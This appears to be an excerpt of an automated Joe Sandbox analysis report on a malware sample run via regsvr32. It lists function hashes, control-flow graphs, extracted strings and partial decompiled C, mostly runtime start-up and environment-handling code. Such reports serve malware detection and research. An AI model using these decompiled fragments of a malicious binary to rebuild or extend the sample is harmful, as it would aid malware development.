                                                                                                                                                                                                                    • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                                                                                                                                    • API String ID: 2485490239-3005932707
                                                                                                                                                                                                                    • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                                    • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02587D6C Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 282 2587d6c-2587d9a 283 2587d9c-2587da4 282->283 284 258804a-25880a9 call 259a474 283->284 285 2587daa-2587dad 283->285 293 25880ab-25880b0 284->293 294 25880b5 284->294 287 2587db3-2587db9 285->287 288 2587ff4-2588045 call 2596048 285->288 291 2587dbf-2587dc5 287->291 292 2587f53-2587fef call 259fdcc 287->292 288->283 295 25880ba-25880c0 291->295 296 2587dcb-2587ec1 call 259bb78 291->296 292->283 293->283 294->295 300 2587f40-2587f52 295->300 301 25880c6 295->301 303 2587ec6-2587ecc 296->303 301->283 304 2587ece-2587ed5 303->304 305 2587edf-2587f3b call 2598f30 303->305 304->305 305->300
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                                                                                                                                    • API String ID: 0-308291206
                                                                                                                                                                                                                    • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                                    • Instruction ID: c30eb21de4d241bd2fbda577df0a31a8657de1872d4bee4cfef988bee753e4da
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96913A7150074A8BDF48DF28C88A5DE3FA1FB58398F65422CEC4AA6290D778D595CFC8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259A000 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 307 259a000-259a0cc call 2599f38 call 2592404 312 259a22c-259a243 307->312 313 259a0d2-259a16a call 2599424 307->313 315 259a16f-259a227 call 259c2c0 313->315 315->312
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /Q$;$F8$KT$F$Z
                                                                                                                                                                                                                    • API String ID: 0-1951868783
                                                                                                                                                                                                                    • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                                    • Instruction ID: 6bca5b2542645fdcc408918d06b09a6b1e9eb9bbf52dc8980e9cb9458ceff08d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 006125B0E1470A8FDF48CFA8D48A4DEBBB1FB58314F10821DE846A7290D7749995CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                    			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}











                                                                                                                                                                                                                    0x180010ac0
                                                                                                                                                                                                                    0x180010ac5
                                                                                                                                                                                                                    0x180010ac9
                                                                                                                                                                                                                    0x180010ad6
                                                                                                                                                                                                                    0x180010adf
                                                                                                                                                                                                                    0x180010ae1
                                                                                                                                                                                                                    0x180010aeb
                                                                                                                                                                                                                    0x180010af2
                                                                                                                                                                                                                    0x180010afa
                                                                                                                                                                                                                    0x180010b02
                                                                                                                                                                                                                    0x180010b0b
                                                                                                                                                                                                                    0x180010b1b
                                                                                                                                                                                                                    0x180010b22

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                    • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                                    • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258CC14 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 358 258cc14-258cc36 359 258cc40 358->359 360 258cc42-258cc48 359->360 361 258cfbb-258d136 call 25a826c call 2581718 360->361 362 258cc4e-258cc54 360->362 375 258d138 361->375 376 258d13d-258d314 call 2581718 call 25a1ac4 361->376 364 258cc5a-258cc60 362->364 365 258cfb1-258cfb6 362->365 367 258d31f-258d325 364->367 368 258cc66-258cc73 364->368 365->360 367->360 369 258d32b-258d338 367->369 371 258ccb0-258cccb 368->371 372 258cc75-258ccae 368->372 374 258ccd5-258cf8f call 2588870 call 2581718 call 25a1ac4 371->374 372->374 388 258cf94-258cf9c 374->388 375->376 376->359 386 258d31a 376->386 386->367 388->369 389 258cfa2-258cfac 388->389
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0c$\$c2&
                                                                                                                                                                                                                    • API String ID: 0-1001447681
                                                                                                                                                                                                                    • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                                    • Instruction ID: 71053aab40a64e7078884efbb3351383bb75bfa3556d2c9f822e684e0a74b0e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F802F7711083C88BEBBEDF64C8896DE7BADFB44708F10511DEA0A9E298DB745744CB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02588BC8 Relevance: 4.0, Strings: 3, Instructions: 213COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 390 2588bc8-2588c26 call 2599f38 393 2588c2b-2588c30 390->393 394 2588e8a-2588e9a call 2582c08 393->394 395 2588c36-2588c3b 393->395 402 2588e9c-2588ea1 394->402 403 2588ea6 394->403 397 2588e7b-2588e85 395->397 398 2588c41-2588c43 395->398 397->393 400 2588eb8-2588f90 call 259c2c0 398->400 401 2588c49-2588c4e 398->401 410 2588f95-2588fad 400->410 404 2588d71-2588e5f call 25952c0 401->404 405 2588c54-2588c59 401->405 402->393 409 2588ea8-2588ead 403->409 415 2588e64-2588e6b 404->415 407 2588c5f-2588c64 405->407 408 2588d10-2588d6a call 2598d60 405->408 407->409 412 2588c6a-2588d0b call 259bf94 407->412 417 2588d6f Process32FirstW 408->417 409->410 413 2588eb3 409->413 412->393 413->393 415->410 418 2588e71-2588e76 415->418 417->404 418->393
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .f$M$N5
                                                                                                                                                                                                                    • API String ID: 0-1477915503
                                                                                                                                                                                                                    • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                                    • Instruction ID: b998224d857a87f09c1c63266cf120191f1c2481c9887f8a2910f81208247aa8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52A170701197489FD7A8DF28C8C959EBBE1FB84304F906A1DF8869B2A0CB74D944CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02598FC8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 464 2598fc8-2598ff9 call 2599f38 467 2599000 464->467 468 2599005-259900b 467->468 469 2599011-2599017 468->469 470 2599354-25993f0 call 259464c 468->470 471 259901d-2599023 469->471 472 2599134-2599235 call 259eac0 call 25a1684 469->472 478 25993f5 470->478 474 2599029-259902b 471->474 475 259912a-259912f 471->475 486 259923a-259934f call 25887dc 472->486 479 25993fa-2599400 474->479 480 2599031-2599125 call 25949b0 474->480 475->468 478->479 479->468 482 2599406-2599421 479->482 480->467 486->478
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A]jN
                                                                                                                                                                                                                    • API String ID: 0-1761522205
                                                                                                                                                                                                                    • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                                    • Instruction ID: 35f6fcbf569c5fea075a08561fd99a852f0414f1e25a56931af0a91800e6e544
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F10462DD556BB290D7785A46CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                    • API String ID: 0-3705061908
                                                                                                                                                                                                                    • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                                    • Instruction ID: 820284cc72e5da374bac0cc0dc4f4b26f980106e691f9f123d3d9631017e9748
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E61BF7151C7848BD768DF28C18A41FBBF1FBD6748F000A1DE69A862A0D7B6D958CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 137 1800014b1-1800014f0 call 180001268 135->137 138 180001489-18000148c 135->138 139 1800015e4-1800015f9 136->139 157 1800014f6-18000150b call 1800010fc 137->157 158 1800015be 137->158 140 1800014a4 __scrt_dllmain_crt_thread_attach 138->140 141 18000148e-180001491 138->141 142 180001608-180001622 call 1800010fc 139->142 143 1800015fb 139->143 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->155 156 18000165b-18000168c call 180001c48 142->156 147 1800015fd-180001607 143->147 146->149 155->147 168 18000169d-1800016a3 156->168 169 18000168e-180001694 156->169 166 180001511-180001522 call 18000116c 157->166 167 1800015d6-1800015e3 call 180001c48 157->167 162 1800015c0-1800015d5 158->162 184 180001573-18000157d call 1800013d8 166->184 185 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 166->185 167->139 174 1800016a5-1800016af 168->174 175 1800016ea-1800016f2 call 180010ac0 168->175 169->168 173 180001696-180001698 169->173 180 18000178b-180001798 173->180 181 1800016b1-1800016b9 174->181 182 1800016bb-1800016c9 174->182 186 1800016f7-180001700 175->186 187 1800016cf-1800016d7 call 18000147c 181->187 182->187 198 180001781-180001789 182->198 184->158 206 18000157f-18000158b call 180001e8c 184->206 185->184 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 185->234 194 180001702-180001704 186->194 195 180001738-18000173a 186->195 200 1800016dc-1800016e4 187->200 194->195 203 180001706-180001728 call 180010ac0 call 1800015e4 194->203 196 180001741-180001756 call 18000147c 195->196 197 18000173c-18000173f 195->197 196->198 215 180001758-180001762 196->215 197->196 197->198 198->180 200->175 200->198 203->195 229 18000172a-18000172f 203->229 223 1800015b1-1800015bc 206->223 224 18000158d-180001597 call 180001340 206->224 220 180001764-18000176b 215->220 221 18000176d-18000177d 215->221 220->198 221->198 223->162 224->223 233 180001599-1800015a7 224->233 229->195 233->223 234->184 235 180001553-180001570 call 180006d5c 234->235 235->184
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}




                                                                                                                                                                                                                    0x180001480
                                                                                                                                                                                                                    0x180001482
                                                                                                                                                                                                                    0x180001487
                                                                                                                                                                                                                    0x18000148c
                                                                                                                                                                                                                    0x180001491
                                                                                                                                                                                                                    0x18000149c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                    • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                                    • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                    • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                                    • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000A234 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                    			E0000000118000A234(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				void* _t75;
				WCHAR* _t76;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0x8000a264;
				goto 0x8000a327;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0x8000a289;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x8000a270;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x8000a26c;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E0000000118000A154();
				if (0 != 0) goto 0x8000a2c7;
				FreeEnvironmentStringsW(_t76);
				goto 0x8000a25d;
				E0000000118000B4C4(_t47, 0, _t75);
				_t57 = _t47;
				if (_t47 != 0) goto 0x8000a2e0;
				_t25 = E0000000118000878C(_t47, 0);
				goto 0x8000a2bc;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E0000000118000A154();
				if (_t25 != 0) goto 0x8000a311;
				E0000000118000878C(_t47, _t47);
				goto 0x8000a31b;
				E0000000118000878C(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}












                                                                                                                                                                                                                    0x18000a234
                                                                                                                                                                                                                    0x18000a237
                                                                                                                                                                                                                    0x18000a23b
                                                                                                                                                                                                                    0x18000a23f
                                                                                                                                                                                                                    0x18000a243
                                                                                                                                                                                                                    0x18000a249
                                                                                                                                                                                                                    0x18000a24d
                                                                                                                                                                                                                    0x18000a25b
                                                                                                                                                                                                                    0x18000a25f
                                                                                                                                                                                                                    0x18000a264
                                                                                                                                                                                                                    0x18000a26a
                                                                                                                                                                                                                    0x18000a270
                                                                                                                                                                                                                    0x18000a278
                                                                                                                                                                                                                    0x18000a287
                                                                                                                                                                                                                    0x18000a289
                                                                                                                                                                                                                    0x18000a291
                                                                                                                                                                                                                    0x18000a2a0
                                                                                                                                                                                                                    0x18000a2a3
                                                                                                                                                                                                                    0x18000a2a9
                                                                                                                                                                                                                    0x18000a2b0
                                                                                                                                                                                                                    0x18000a2ba
                                                                                                                                                                                                                    0x18000a2bf
                                                                                                                                                                                                                    0x18000a2c5
                                                                                                                                                                                                                    0x18000a2ca
                                                                                                                                                                                                                    0x18000a2cf
                                                                                                                                                                                                                    0x18000a2d5
                                                                                                                                                                                                                    0x18000a2d9
                                                                                                                                                                                                                    0x18000a2de
                                                                                                                                                                                                                    0x18000a2e0
                                                                                                                                                                                                                    0x18000a2e5
                                                                                                                                                                                                                    0x18000a2e8
                                                                                                                                                                                                                    0x18000a2f0
                                                                                                                                                                                                                    0x18000a2f9
                                                                                                                                                                                                                    0x18000a2fe
                                                                                                                                                                                                                    0x18000a305
                                                                                                                                                                                                                    0x18000a30a
                                                                                                                                                                                                                    0x18000a30f
                                                                                                                                                                                                                    0x18000a313
                                                                                                                                                                                                                    0x18000a341

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A24D
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A2BF
                                                                                                                                                                                                                      • Part of subcall function 000000018000B4C4: HeapAlloc.KERNEL32(?,?,?,000000018000D071,?,?,00000000,000000018000A3A3,?,?,?,00000001800068CF,?,?,?,00000001800067C5), ref: 000000018000B502
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A31E
                                                                                                                                                                                                                      • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                                                                                                                                      • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
